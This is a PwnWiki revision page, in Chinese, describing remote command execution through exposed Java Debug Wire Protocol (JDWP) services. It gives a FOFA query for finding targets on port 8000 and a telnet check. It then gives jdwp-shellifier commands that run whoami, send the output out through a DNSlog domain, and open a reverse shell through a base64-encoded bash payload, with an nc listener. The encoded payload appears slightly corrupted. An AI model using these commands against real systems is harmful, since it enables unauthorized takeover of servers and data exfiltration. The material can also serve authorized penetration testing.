Difference between revisions of "JDWP 遠程命令執行漏洞"

From PwnWiki
(Created page with "<languages /> ==FOFA== <pre> banner=”jdwp” && port="8000" </pre>")
 
Line 3: Line 3:
 
==FOFA==
 
==FOFA==
 
<pre>
 
<pre>
 +
banner=”jdwp” && port="8000"
 +
</pre>
 +
 +
==POC==
 +
<pre>
 +
telnet xxx.xxx.xxx.xxx 8000
 +
</pre>
 +
 +
<translate>
 +
返回以下信息,表示漏洞存在。但是請注意,部分情況下無任何回顯也能成功利用。
 +
</translate>
 +
<pre>
 +
JDWP-Handsharke
 +
</pre>
 +
 +
==EXP==
 +
https://github.com/IOActive/jdwp-shellifier
 +
 +
<pre>
 +
python jdwp-shellifier.py -t xxx.xxx.xxx.xxx -p 8000 --break-on "java.lang.String.indexOf" --cmd "whoami"
 +
</pre>
 +
 +
 +
<translate>
 +
使用Dnslog回顯:
 +
</translate>
 +
<pre>
 +
python jdwp-shellifier.py -t xxx.xxx.xxx.xxx -p 8000 --break-on "java.lang.String.indexOf" --cmd "ping http://.`whoami`.yoww7w.dnslog.cn"
 +
</pre>
  
banner=”jdwp” && port="8000"
 
  
 +
==Getshell==
 +
<pre>
 +
python jdwp-shellifier.py -t xxx.xxx.xxx.xxx -p 8000 --break-on "java.lang.String.indexOf" --cmd "bash -c {echo,YmFzaCAtaSA+JiAvfrV2L3RjcC8xOTIgrth4LjE4NS42Lzg4ODggMD4mMQ==}|{base64,-d}|{bash,-i}"
 +
</pre>
 +
<translate>
 +
監聽機器執行:
 +
</translate>
 +
<pre>
 +
nc -lvp 8888
 
</pre>
 
</pre>

Revision as of 10:06, 7 April 2021

Other languages:
Chinese • ‎português • ‎中文(繁體)‎

FOFA

banner=”jdwp” && port="8000"

POC

telnet xxx.xxx.xxx.xxx 8000

返回以下信息,表示漏洞存在。但是請注意,部分情況下無任何回顯也能成功利用。 

JDWP-Handsharke

EXP

https://github.com/IOActive/jdwp-shellifier 

python jdwp-shellifier.py -t xxx.xxx.xxx.xxx -p 8000 --break-on "java.lang.String.indexOf" --cmd "whoami"


使用Dnslog回顯: 

python jdwp-shellifier.py -t xxx.xxx.xxx.xxx -p 8000 --break-on "java.lang.String.indexOf" --cmd "ping http://.`whoami`.yoww7w.dnslog.cn"


Getshell

python jdwp-shellifier.py -t xxx.xxx.xxx.xxx -p 8000 --break-on "java.lang.String.indexOf" --cmd "bash -c {echo,YmFzaCAtaSA+JiAvfrV2L3RjcC8xOTIgrth4LjE4NS42Lzg4ODggMD4mMQ==}|{base64,-d}|{bash,-i}"

監聽機器執行: 

nc -lvp 8888
Retrieved from "https://pwnwiki.com/index.php?title=JDWP_遠程命令執行漏洞&oldid=1050"